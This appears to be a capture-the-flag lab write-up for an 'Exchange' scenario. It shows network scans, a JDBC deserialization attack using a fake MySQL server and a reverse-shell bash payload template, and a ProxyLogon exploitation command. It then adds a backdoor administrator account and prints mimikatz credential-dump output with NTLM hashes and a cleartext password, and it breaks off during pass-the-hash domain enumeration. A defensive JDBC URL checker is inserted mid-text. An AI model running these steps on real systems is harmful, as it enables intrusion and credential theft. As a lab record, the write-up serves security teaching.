春秋云境 - Exchange

fscan scan

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.152.160:80 open
39.99.152.160:22 open
39.99.152.160:8000 open

Port 8000: log in with the weak credentials admin/123456.

华夏ERP deserialization

There is no exploitable hole in the admin backend itself, so go after JDBC; reference: https://www.cnblogs.com/kingbridge/articles/16720318.html

Start a fake MySQL service on the VPS: https://github.com/fnmsd/MySQL_Fake_Server

config.json (put ysoserial-all.jar in the same directory as server.py); replace the part after bash -c with the base64-encoded reverse-shell payload and copy the rest verbatim:

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonCollections6","bash -c {echo,base64反弹shell}|{base64,-d}|{bash,-i}"]
    }
}


Start the service with python3 server.py.

The payload to send to the site is then the URL-encoded form of the following; capture a request and change the path.

find / -name flag*
cat /root/flag/flag01.txt
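As an added, defender-side example (not code from the writeup or from 华夏ERP): the JDBC attack above only works because the application connects to whatever MySQL JDBC URL the caller supplies, and MySQL Connector/J honours connection properties that make the client deserialize objects sent by the (fake) server. This Python check validates such a URL against a host allowlist and rejects those properties; the property names are real Connector/J options, while ALLOWED_HOSTS and the sample URLs are constructed.

```python
"""Validate a caller-supplied MySQL JDBC URL before handing it to the driver.

Added example, not code from the writeup or from 华夏ERP. The attack in this
section needs two things: the application connects to whatever JDBC URL the
caller supplies, and MySQL Connector/J honours connection properties that make
the client deserialize Java objects sent by the (fake) server. The property
names below are real Connector/J options; ALLOWED_HOSTS and the sample URLs
are constructed for this example.
"""
from urllib.parse import parse_qsl, urlsplit

# Connector/J properties that let a malicious server run code in the client
# (client-side deserialization or attacker-chosen interceptor classes), plus
# the LOAD DATA LOCAL options that let the server read client files.
DANGEROUS_PROPS = {
    "autodeserialize",
    "queryinterceptors",
    "statementinterceptors",
    "detectcustomcollations",
    "allowloadlocalinfile",
    "allowurlinlocalinfile",
}

# Database hosts the application is allowed to talk to (constructed allowlist).
ALLOWED_HOSTS = {"127.0.0.1", "db.internal.example"}


class UnsafeJdbcUrl(ValueError):
    """Raised for URL shapes that cannot be checked safely."""


def parse_jdbc_mysql(url):
    """Return (host, port, params) for a plain jdbc:mysql://host[:port]/db?... URL.

    Multi-host, failover and address=(...) forms are rejected outright because
    they can hide a second, attacker-chosen host.
    """
    if not url.lower().startswith("jdbc:mysql://"):
        raise UnsafeJdbcUrl("not a jdbc:mysql:// URL")
    parts = urlsplit(url[len("jdbc:"):])
    netloc = parts.netloc.lower()
    if not netloc or "," in netloc or "address=" in netloc:
        raise UnsafeJdbcUrl("multi-host or address=() URL form is not allowed")
    host = parts.hostname
    if host is None:
        raise UnsafeJdbcUrl("missing host")
    # Property names are compared case-insensitively so a mixed-case spelling
    # cannot slip past the check.
    params = {k.lower(): v for k, v in parse_qsl(parts.query, keep_blank_values=True)}
    return host, parts.port or 3306, params


def check_jdbc_url(url):
    """Return a list of findings; an empty list means the URL may be used."""
    host, _port, params = parse_jdbc_mysql(url)
    findings = []
    if host not in ALLOWED_HOSTS:
        findings.append(f"host {host!r} is not in the allowlist")
    bad = sorted(DANGEROUS_PROPS & set(params))
    if bad:
        findings.append("dangerous connection properties: " + ", ".join(bad))
    return findings


if __name__ == "__main__":
    for sample in (
        "jdbc:mysql://127.0.0.1:3306/jsh_erp?useSSL=false&characterEncoding=utf8",
        "jdbc:mysql://198.51.100.7:3306/test?autoDeserialize=true&queryInterceptors=x",
    ):
        print(sample, "->", check_jdbc_url(sample) or "OK")
```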

Internal network penetration

Next, move on to the internal network: set up a proxy first and run fscan.


   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
[*] Icmp alive hosts len is: 4
172.22.3.12:8000 open
172.22.3.9:445 open
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.9:139 open
172.22.3.26:139 open
172.22.3.2:139 open
172.22.3.9:135 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.2:88 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.9:8172 open
172.22.3.9:808 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] WebTitle http://172.22.3.12 code:200 len:19813 title:lumia
[*] NetInfo
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] NetInfo
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[*] NetBios 172.22.3.2 [+] DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] OsInfo 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab eWindows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 11.337402915s

Analysis

172.22.3.12     current machine
172.22.3.9      Exchange server in the domain
172.22.3.2      domain controller
172.22.3.26     domain member machine

Visiting 172.22.3.9 shows Exchange Server 2016, so go straight to ProxyLogon.

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

After exploitation you get a SYSTEM shell; add a user:

net user calm qwer1234! /add
net localgroup administrators calm /add

RDP in and grab the flag.

Upload mimikatz and dump credentials; remember to run it as administrator.

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 10598763 (00000000:00a1b96b)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 15:26:47
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : d8ab6a5ecc31f0ee092162f6b4cbbb42
* SHA1 : ba8a181c30dd83e3cb8c8d62315ae23163340479
* DPAPI : 608ba79cc390d4c930b34bb0e2fd9c35
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 10000700 (00000000:0098993c)
Session : RemoteInteractive from 3
User Name : calm
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2025/3/11 15:25:44
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : calm
* Domain : XIAORANG-EXC01
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : calm
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : calm
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 9993321 (00000000:00987c69)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 15:25:43
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 9993305 (00000000:00987c59)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 15:25:43
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 2217558 (00000000:0021d656)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 14:49:24
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 2dd2fea458c9690609313e7d7c1d1094
* SHA1 : 710b23fb4ffb87bf98b5821e0e7a9b622e0a3283
* DPAPI : 4bb9f57b64b8fb82bcaabba12708f6bb
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 108951 (00000000:0001a997)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 14:47:44
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 66126 (00000000:0001024e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 14:47:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 9587463cfa3fd1ea760c401e2c52e224
* SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96
ssp :
credman :

Authentication Id : 0 ; 66047 (00000000:000101ff)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 14:47:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 10614933 (00000000:00a1f895)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 15:27:00
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : d8ab6a5ecc31f0ee092162f6b4cbbb42
* SHA1 : ba8a181c30dd83e3cb8c8d62315ae23163340479
* DPAPI : 608ba79cc390d4c930b34bb0e2fd9c35
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 10000729 (00000000:00989959)
Session : RemoteInteractive from 3
User Name : calm
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2025/3/11 15:25:44
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : calm
* Domain : XIAORANG-EXC01
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : calm
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : calm
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/11 14:47:45
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/11 14:47:27
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 8772690 (00000000:0085dc52)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2025/3/11 15:19:10
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 1954603 (00000000:001dd32b)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 14:49:11
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 1880438 (00000000:001cb176)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 14:49:10
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/11 14:47:42
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 23747 (00000000:00005cc3)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/11 14:47:27
SID :
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
kerberos :
ssp :
[00000000]
* Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
* Domain : (null)
* Password : Mh*vj]Z]Q02hqT+VLOB:_Se]zl@VS+v>4Z^P+c=u;VQf+MiJD(?^=w#RmpxDeEI29QR&e%^9nn3s*35h74jW5JeWV8^8fa#f9SIAv5)Dl5#hqaUZO2)m-)VT=huQe)[c
credman :

Authentication Id : 0 ; 2399786 (00000000:00249e2a)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 14:49:39
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 2dd2fea458c9690609313e7d7c1d1094
* SHA1 : 710b23fb4ffb87bf98b5821e0e7a9b622e0a3283
* DPAPI : 4bb9f57b64b8fb82bcaabba12708f6bb
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 1880415 (00000000:001cb15f)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/11 14:49:10
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 55c05b3a95ba11efa84aa33e20861e6f
* SHA1 : a551d481dcc12fcc09b5f27660b7b78d12b0523a
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 0f 3a 16 8a 52 bd 7d cc fe 2b 9c 57 8b f5 c7 7a c5 f0 a9 68 27 59 d1 8e a2 f1 ce af 48 b1 05 f2 1a 8d 9d 0c 85 7c 85 80 7e e3 0e 68 4c cc 8a f4 0e 93 af 23 26 4a 26 03 b3 2c 88 18 98 da db 21 93 40 d8 78 05 ec 4d 4e 2d d4 55 fe c6 2b 31 d6 11 fe dc 51 5c 00 c1 eb 67 a1 15 d0 56 c7 31 dd da dd f8 42 19 e0 9a 6f 89 76 bf 17 de be 6e cf a4 1f 09 8d 12 b2 83 69 83 e1 e9 32 56 ee 43 47 19 35 66 f5 e9 44 ee 5d 90 e1 60 01 bd 46 12 e7 54 1c 84 14 58 4a a4 00 18 ce 93 6d 9c b5 0a 3d 6d d9 db 02 86 44 1e 1b fc 62 73 b0 51 8a 09 44 50 dc 14 b1 38 d2 1d cd 71 d3 ed e5 c6 a2 1d 07 17 bd 2f 9b 58 79 91 d6 ed 73 76 a9 a8 47 fe 28 eb 99 f0 c0 52 72 8b 29 3d ea e1 41 79 e7 59 39 22 b0 0b 66 f9 ea c1 70 02 59 9e df a2 1d b8 96
ssp :
credman :

Authentication Id : 0 ; 105109 (00000000:00019a95)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/11 14:47:44
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/11 14:47:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

mimikatz(commandline) # exit
Bye!

These two are the useful ones:

Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4

XIAORANG-EXC01$
55c05b3a95ba11efa84aa33e20861e6f

Upload Adinfo to collect domain information.

.\Adinfo_win.exe -d xiaorang.lab --dc 172.22.3.2 -u XIAORANG-EXC01$ -H 55c05b3a95ba11efa84aa33e20861e6f
           _____  _        __
     /\   |  __ \(_)      / _|
    /  \  | |  | |_ _ __ | |_ ___
